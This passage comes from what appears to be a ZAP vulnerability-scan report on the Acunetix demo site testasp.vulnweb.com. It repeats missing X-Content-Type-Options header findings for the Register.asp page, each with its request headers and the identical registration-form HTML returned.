InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it 